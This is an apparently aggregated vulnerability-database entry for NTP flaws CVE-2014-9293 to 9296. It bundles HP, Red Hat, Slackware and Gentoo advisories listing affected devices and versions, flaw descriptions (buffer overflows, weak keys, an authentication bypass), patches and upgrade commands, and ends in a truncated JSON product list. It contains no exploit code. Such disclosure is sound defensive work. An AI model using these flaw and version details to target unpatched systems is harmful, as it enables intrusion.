12900 (Comware 7) R1112 JG619A HP FlexFabric 12910 Switch AC Chassis, JG621A HP FlexFabric 12910 Main Processing Unit, JG632A HP FlexFabric 12916 Switch AC Chassis, JG634A HP FlexFabric 12916 Main Processing Unit

CVE-2014-9295

5900 (Comware 7) R2311P06 JC772A HP 5900AF-48XG-4QSFP+ Switch, JG336A HP 5900AF-48XGT-4QSFP+ Switch, JG510A HP 5900AF-48G-4XG-2QSFP+ Switch, JG554A HP 5900AF-48XG-4QSFP+ TAA Switch, JG838A HP FF 5900CP-48XG-4QSFP+ Switch, JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant, JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch, JH038A) HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant

CVE-2014-9295

5920 (Comware 7) R2311P06 JG296A HP 5920AF-24XG Switch, JG555A HP 5920AF-24XG TAA Switch

CVE-2014-9295

MSR1000 (Comware 7) R0106P31 JG875A HP MSR1002-4 AC Router, JH060A HP MSR1003-8S AC Router

CVE-2014-9295

MSR2000 (Comware 7) R0106P31 JG411A HP MSR2003 AC Router, JG734A HP MSR2004-24 AC Router, JG735A) HP MSR2004-48 Router, JG866A HP MSR2003 TAA-compliant AC Router

CVE-2014-9295

MSR3000 (Comware 7) R0106P31 JG404A HP MSR3064 Router, JG405A HP MSR3044 Router, JG406A HP MSR3024 AC Router, JG407A HP MSR3024 DC Router, JG408A HP MSR3024 PoE Router, JG409A HP MSR3012 AC Router, JG410A HP MSR3012 DC Router, JG861A HP MSR3024 TAA-compliant AC Router

CVE-2014-9295

MSR4000 (Comware 7) R0106P31 JG402A HP MSR4080 Router Chassis, JG403A HP MSR4060 Router Chassis, JG412A HP MSR4000 MPU-100 Main Processing Unit, JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit

CVE-2014-9295

5800 (Comware 7) R7006P12 JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP 5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2 Slots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP 5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot, JC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1 Interface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP 5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch, JG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G Switch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots, JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B HP 5820-24XG-SFP+ TAA-compliant Switch, JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot, JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot, JC106A HP 5820-14XG-SFP+ Switch with 2 Slots, JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot, JG219A HP 5820AF-24XG Switch, JG219B HP 5820AF-24XG Switch, JC102A HP 5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+ Switch

CVE-2014-9295

VSR (Comware 7) R0204P01 JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software, JG811AAE HP VSR1001 Comware 7 Virtual Services Router, JG812AAE HP VSR1004 Comware 7 Virtual Services Router, JG813AAE HP VSR1008 Comware 7 Virtual Services Router

CVE-2014-9295

7900 (Comware 7) R2122 JG682A HP FlexFabric 7904 Switch Chassis, JG841A HP FlexFabric 7910 Switch Chassis, JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit, JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit

CVE-2014-9295

5130 (Comware 7) R3108P03 JG932A HP 5130-24G-4SFP+ EI Switch, JG933A HP 5130-24G-SFP-4SFP+ EI Switch, JG934A HP 5130-48G-4SFP+ EI Switch, JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch, JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch, JG975A HP 5130-24G-4SFP+ EI Brazil Switch, JG976A HP 5130-48G-4SFP+ EI Brazil Switch, JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch, JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch

CVE-2014-9295

5700 (Comware 7) R2311P06 JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch, JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch, JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch, JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch, JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch, JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch

CVE-2014-9295

VCX 9.8.17 J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr, J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr, JC517A HP VCX V7205 Platform w/DL 360 G6 Server, JE355A HP VCX V6000 Branch Platform 9.0, JC516A HP VCX V7005 Platform w/DL 120 G6 Server, JC518A HP VCX Connect 200 Primry 120 G6 Server, J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr, JE341A HP VCX Connect 100 Secondary, JE252A HP VCX Connect Primary MIM Module, JE253A HP VCX Connect Secondary MIM Module, JE254A HP VCX Branch MIM Module, JE355A HP VCX V6000 Branch Platform 9.0, JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod, JD023A HP MSR30-40 Router with VCX MIM Module, JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM, JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod, JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod, JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod, JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS, JE340A HP VCX Connect 100 Pri Server 9.0, JE342A HP VCX Connect 100 Sec Server 9.0

CVE -2014-9293 CVE-2014-9294 CVE-2014-9295

HISTORY Version:1 (rev.1) - 9 December 2015 Initial release

===================================================================== Red Hat Security Advisory

Synopsis: Important: ntp security update Advisory ID: RHSA-2015:0104-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0104.html Issue date: 2015-01-28 CVE Names: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296 =====================================================================

Summary:

Updated ntp packages that fix several security issues are now available for Red Hat Enterprise Linux 6.5 Extended Update Support.

Relevant releases/architectures:

Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.5) - noarch, x86_64 Red Hat Enterprise Linux HPC Node EUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server EUS (v. 6.5) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 6.5) - i386, noarch, ppc64, s390x, x86_64

Multiple buffer overflow flaws were discovered in ntpd's crypto_recv(), ctl_putdata(), and configure() functions. Note: the crypto_recv() flaw requires non-default configurations to be active, while the ctl_putdata() flaw, by default, can only be exploited via local attackers, and the configure() flaw requires additional authentication to exploit. (CVE-2014-9295)

It was found that ntpd automatically generated weak keys for its internal use if no ntpdc request authentication key was specified in the ntp.conf configuration file. A remote attacker able to match the configured IP restrictions could guess the generated key, and possibly use it to send ntpdc query or configuration requests. (CVE-2014-9293)

It was found that ntp-keygen used a weak method for generating MD5 keys. This could possibly allow an attacker to guess generated MD5 keys that could then be used to spoof an NTP client or server. Note: it is recommended to regenerate any MD5 keys that had explicitly been generated with ntp-keygen; the default installation does not contain such keys. (CVE-2014-9294)

A missing return statement in the receive() function could potentially allow a remote attacker to bypass NTP's authentication mechanism. (CVE-2014-9296)

All ntp users are advised to upgrade to this updated package, which contains backported patches to resolve these issues. After installing the update, the ntpd daemon will restart automatically.

Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1176032 - CVE-2014-9293 ntp: automatic generation of weak default key in config_auth() 1176035 - CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys 1176037 - CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets 1176040 - CVE-2014-9296 ntp: receive() missing return on error

Package List:

Red Hat Enterprise Linux HPC Node EUS (v. 6.5):

Source: ntp-4.2.6p5-2.el6_5.src.rpm

x86_64: ntp-4.2.6p5-2.el6_5.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm ntpdate-4.2.6p5-2.el6_5.x86_64.rpm

Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.5):

Source: ntp-4.2.6p5-2.el6_5.src.rpm

noarch: ntp-doc-4.2.6p5-2.el6_5.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm ntp-perl-4.2.6p5-2.el6_5.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 6.5):

Source: ntp-4.2.6p5-2.el6_5.src.rpm

i386: ntp-4.2.6p5-2.el6_5.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_5.i686.rpm ntpdate-4.2.6p5-2.el6_5.i686.rpm

ppc64: ntp-4.2.6p5-2.el6_5.ppc64.rpm ntp-debuginfo-4.2.6p5-2.el6_5.ppc64.rpm ntpdate-4.2.6p5-2.el6_5.ppc64.rpm

s390x: ntp-4.2.6p5-2.el6_5.s390x.rpm ntp-debuginfo-4.2.6p5-2.el6_5.s390x.rpm ntpdate-4.2.6p5-2.el6_5.s390x.rpm

x86_64: ntp-4.2.6p5-2.el6_5.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm ntpdate-4.2.6p5-2.el6_5.x86_64.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 6.5):

Source: ntp-4.2.6p5-2.el6_5.src.rpm

i386: ntp-debuginfo-4.2.6p5-2.el6_5.i686.rpm ntp-perl-4.2.6p5-2.el6_5.i686.rpm

noarch: ntp-doc-4.2.6p5-2.el6_5.noarch.rpm

ppc64: ntp-debuginfo-4.2.6p5-2.el6_5.ppc64.rpm ntp-perl-4.2.6p5-2.el6_5.ppc64.rpm

s390x: ntp-debuginfo-4.2.6p5-2.el6_5.s390x.rpm ntp-perl-4.2.6p5-2.el6_5.s390x.rpm

x86_64: ntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm ntp-perl-4.2.6p5-2.el6_5.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2014-9293 https://access.redhat.com/security/cve/CVE-2014-9294 https://access.redhat.com/security/cve/CVE-2014-9295 https://access.redhat.com/security/cve/CVE-2014-9296 https://access.redhat.com/security/updates/classification/#important

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFUyTXWXlSAg2UNWIIRAsXzAKCilJuJeeWLOABs1xY+ueRvRTSpWACcDhoC YQlhn66RRMYQCWymo1OCUoI= =4Rft -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .

Release Date: 2015-02-18 Last Updated: 2015-02-18

Potential Security Impact: Remote execution of code, Denial of Service (DoS), or other vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running NTP. These could be exploited remotely to execute code, create a Denial of Service (DoS), or other vulnerabilities.

References:

CVE-2014-9293 - Insufficient Entropy in Pseudo-Random Number Generator (PRNG) (CWE-332) CVE-2014-9294 - Use of Cryptographically Weak PRNG (CWE-338) CVE-2014-9295 - Stack Buffer Overflow (CWE-121) CVE-2014-9296 - Error Conditions, Return Values, Status Codes (CWE-389) CVE-2014-9297 - Improper Check for Unusual or Exceptional Conditions (CWE-754) SSRT101872 VU#852879

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP-UX B.11.31 running NTP version C.4.2.6.4.0 or previous HP-UX B.11.23 running XNTP version 3.5 or previous

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2014-9293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9294 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9295 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9296 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-9297 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following patch for HP-UX B.11.31. A workaround for HP-UX B.11.23 and B.11.11 to temporarily resolve these vulnerabilities follows below.

The B.11.31 patch is available from: ftp://ntp42650:Secure12@h2.usa.hp.com or https://h20392.www2.hp.com/portal/sw depot/displayProductInfo.do?productNumber=HPUX-NTP

Mitigation steps for HP-UX B.11.23 and B.11.11 for CVE-2014-9295

Restrict query for server status (Time Service is not affected) from ntpq/ntpdc by enabling .noquery. using the restrict command in /etc/ntp.conf file.

Reference: http://support.ntp.org/bin/view/Main/SecurityNotice

NOTE: This bulletin will be revised when patches for XNTP v3.5 on B.11.23 and B.11.11 become available.

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.31

NTP.INETSVCS2-BOOT NTP.NTP-AUX NTP.NTP-RUN action: install revision C.4.2.6.5.0 or subsequent

END AFFECTED VERSIONS

HISTORY Version:1 (rev.1) - 18 February 2015 Initial release

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX

Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8-i486-1_slack14.1.txz: Upgraded. In addition to bug fixes and enhancements, this release fixes several high-severity vulnerabilities discovered by Neel Mehta and Stephen Roettger of the Google Security Team. For more information, see: https://www.kb.cert.org/vuls/id/852879 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296 ( Security fix ) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8-i486-1_slack13.0.txz

Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8-x86_64-1_slack13.0.txz

Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8-i486-1_slack13.1.txz

Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8-x86_64-1_slack13.1.txz

Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8-i486-1_slack13.37.txz

Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8-x86_64-1_slack13.37.txz

Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8-x86_64-1_slack14.1.txz

Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8-i486-1.txz

Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8-x86_64-1.txz

MD5 signatures: +-------------+

Slackware 13.0 package: 18d7f09e90cf2434f59d7e9f11478fba ntp-4.2.8-i486-1_slack13.0.txz

Slackware x86_64 13.0 package: edd178e3d2636433dd18f52331af17a5 ntp-4.2.8-x86_64-1_slack13.0.txz

Slackware 13.1 package: 4b6da6fa564b1fe00920d402ff97bd43 ntp-4.2.8-i486-1_slack13.1.txz

Slackware x86_64 13.1 package: 292ae7dbd3ea593c5e28cbba7c2b71fa ntp-4.2.8-x86_64-1_slack13.1.txz

Slackware 13.37 package: 294b8197d360f9a3cf8186619b60b73c ntp-4.2.8-i486-1_slack13.37.txz

Slackware x86_64 13.37 package: 7cd5b63f8371b1cc369bc56e4b4efd5a ntp-4.2.8-x86_64-1_slack13.37.txz

Slackware 14.0 package: 32eab67538c33e4669bda9200799a497 ntp-4.2.8-i486-1_slack14.0.txz

Slackware x86_64 14.0 package: 33ecf4845fa8533a12a98879815bde08 ntp-4.2.8-x86_64-1_slack14.0.txz

Slackware 14.1 package: f2b45a45c846a909ae201176ce359939 ntp-4.2.8-i486-1_slack14.1.txz

Slackware x86_64 14.1 package: 12d7ab6e2541af4d1282621d3773e7f7 ntp-4.2.8-x86_64-1_slack14.1.txz

Slackware -current package: 5b2150cee9840d8bb547098cccde879a n/ntp-4.2.8-i486-1.txz

Slackware x86_64 -current package: 9ce09c5d6a60d3e2117988e4551e4af1 n/ntp-4.2.8-x86_64-1.txz

Installation instructions: +------------------------+

Upgrade the package as root:

upgradepkg ntp-4.2.8-i486-1_slack14.1.txz

Then, restart the NTP daemon:

sh /etc/rc.d/rc.ntpd restart

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

References:

CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296 CVE-2013-5211 SSRT102239

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

Platform Patch Kit Name

Alpha IA64 V8.4 75-117-380_2015-08-24.BCK

NOTE: Please contact OpenVMS Technical Support to request these patch kits. The net-misc/ntp package contains the official reference implementation by the NTP Project.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/ntp < 4.2.8 >= 4.2.8

Description

Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.

Resolution

All NTP users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8"

References

[ 1 ] CVE-2014-9293 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9293 [ 2 ] CVE-2014-9294 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9294 [ 3 ] CVE-2014-9295 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9295 [ 4 ] CVE-2014-9296 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9296

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-201412-34.xml

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201412-0613",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ntp",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "ntp",
        "version": "4.2.7"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "apple",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "efficientip",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "omniti",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "watchguard",
        "version": null
      },
      {
        "model": "ntp",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "ntp",
        "version": "4.2.8"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sigmablade em card (n8405-043) for firmware  rev.14.02 before"
      },
      {
        "model": "istorage",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ne single model / cluster model  ver.002.08.08 previous version"
      },
      {
        "model": "istorage",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "nv7400/nv5400/nv3400 series"
      },
      {
        "model": "istorage",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "nv7500/nv5500/nv3500 series"
      },
      {
        "model": "securebranch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "version 3.2"
      },
      {
        "model": "univerge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "3c cmm"
      },
      {
        "model": "univerge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ip8800 series"
      },
      {
        "model": "ap",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "7000"
      },
      {
        "model": "ap",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "8800"
      },
      {
        "model": "big-ip",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "1500"
      },
      {
        "model": "bs",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "1000 series"
      },
      {
        "model": "bs",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "2000 series"
      },
      {
        "model": "bs",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "2500 series"
      },
      {
        "model": "bs",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "320 series"
      },
      {
        "model": "bs",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "500 series"
      },
      {
        "model": "ha8000 series",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "paging server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "3000"
      },
      {
        "model": "download server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.10"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux enterprise server sp2 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "110"
      },
      {
        "model": "linux enterprise server sp3 for vmware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "linux enterprise server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "linux enterprise server sp1 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "linux enterprise server sp4 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "linux enterprise desktop sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "opensuse evergreen",
        "scope": "eq",
        "trust": 0.3,
